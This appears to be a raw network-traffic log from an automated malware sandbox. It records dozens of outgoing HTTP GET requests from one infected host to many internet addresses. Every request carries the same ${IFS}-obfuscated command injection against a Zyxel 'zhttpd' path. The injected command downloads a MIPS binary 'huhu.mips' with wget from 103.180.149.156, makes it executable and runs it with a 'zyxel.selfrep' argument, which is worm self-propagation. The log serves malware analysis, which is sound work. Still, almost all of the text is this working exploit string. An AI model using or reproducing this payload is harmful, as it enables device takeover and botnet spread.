                                            Feb 2, 2024 06:21:19.769942999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6100192.168.2.155104441.153.26.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.769993067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6101192.168.2.1544330125.194.186.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770045042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6102192.168.2.153822669.50.104.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770082951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6103192.168.2.1541822200.92.143.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770128012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6104192.168.2.153843654.10.19.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770173073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6105192.168.2.1560258190.207.7.66443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770216942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6106192.168.2.155037239.84.100.184443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770256042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6107192.168.2.1550792168.88.81.80443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770279884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6108192.168.2.1559746202.139.45.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770332098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6109192.168.2.153949494.90.95.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770374060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6110192.168.2.1538716105.179.40.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770411015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6111192.168.2.1543192118.165.105.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770442963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6112192.168.2.1550620138.138.128.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770472050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6113192.168.2.154056024.196.173.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770522118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6114192.168.2.155500667.83.174.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770553112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6115192.168.2.1557574180.250.106.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770623922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6116192.168.2.1533778212.136.60.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770647049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6117192.168.2.154090442.7.142.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770692110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6118192.168.2.1535212177.10.6.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770747900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6119192.168.2.155747290.63.101.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770777941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6120192.168.2.1545180177.7.63.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770833015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6121192.168.2.155243063.1.229.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770863056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6122192.168.2.1544372202.176.186.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770905018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6123192.168.2.1548508206.183.6.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.770961046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6124192.168.2.155000850.210.99.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771003008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6125192.168.2.153299017.214.24.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771043062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6126192.168.2.1556114177.122.4.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771080017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6127192.168.2.155250080.191.164.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771111965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6128192.168.2.153608257.253.41.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771152020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6129192.168.2.153975613.254.169.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771177053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6130192.168.2.156098231.182.132.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771214962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6131192.168.2.153744460.208.159.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771261930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6132192.168.2.1551368199.22.175.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771291018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6133192.168.2.155106864.76.19.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771321058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6134192.168.2.154503232.209.66.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771378994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6135192.168.2.154376062.123.213.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771424055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6136192.168.2.1548482164.201.80.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771449089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6137192.168.2.153707247.89.148.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771482944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6138192.168.2.1540124184.113.133.11443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771543980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6139192.168.2.154370268.235.243.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771552086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6140192.168.2.1555142185.153.218.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771606922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6141192.168.2.154658052.19.140.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771683931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6142192.168.2.155924675.129.2.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771714926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6143192.168.2.1558932129.0.117.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771745920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6144192.168.2.155408080.191.147.177443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771804094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6145192.168.2.154394067.221.56.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771833897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6146192.168.2.155891454.125.69.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771878958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6147192.168.2.155360689.126.160.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771915913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6148192.168.2.1555562202.120.156.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771964073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6149192.168.2.15457005.226.45.171443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.771986961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6150192.168.2.153443298.55.10.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772036076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6151192.168.2.1549192164.190.50.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772072077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6152192.168.2.153843880.129.176.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772114992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6153192.168.2.153992285.149.113.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772134066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6154192.168.2.1534542190.44.80.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772182941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6155192.168.2.1535592118.81.0.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772206068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6156192.168.2.1539948181.169.234.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772243023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6157192.168.2.155996831.243.36.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772290945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6158192.168.2.155738227.58.20.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772315979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6159192.168.2.1552938158.83.6.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772356987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6160192.168.2.155975632.157.10.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772404909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6161192.168.2.1536606150.224.193.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772464991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6162192.168.2.15356849.123.70.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:19.772494078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6163192.168.2.1559596220.205.217.232443
                                            TimestampBytes transferredDirectionData
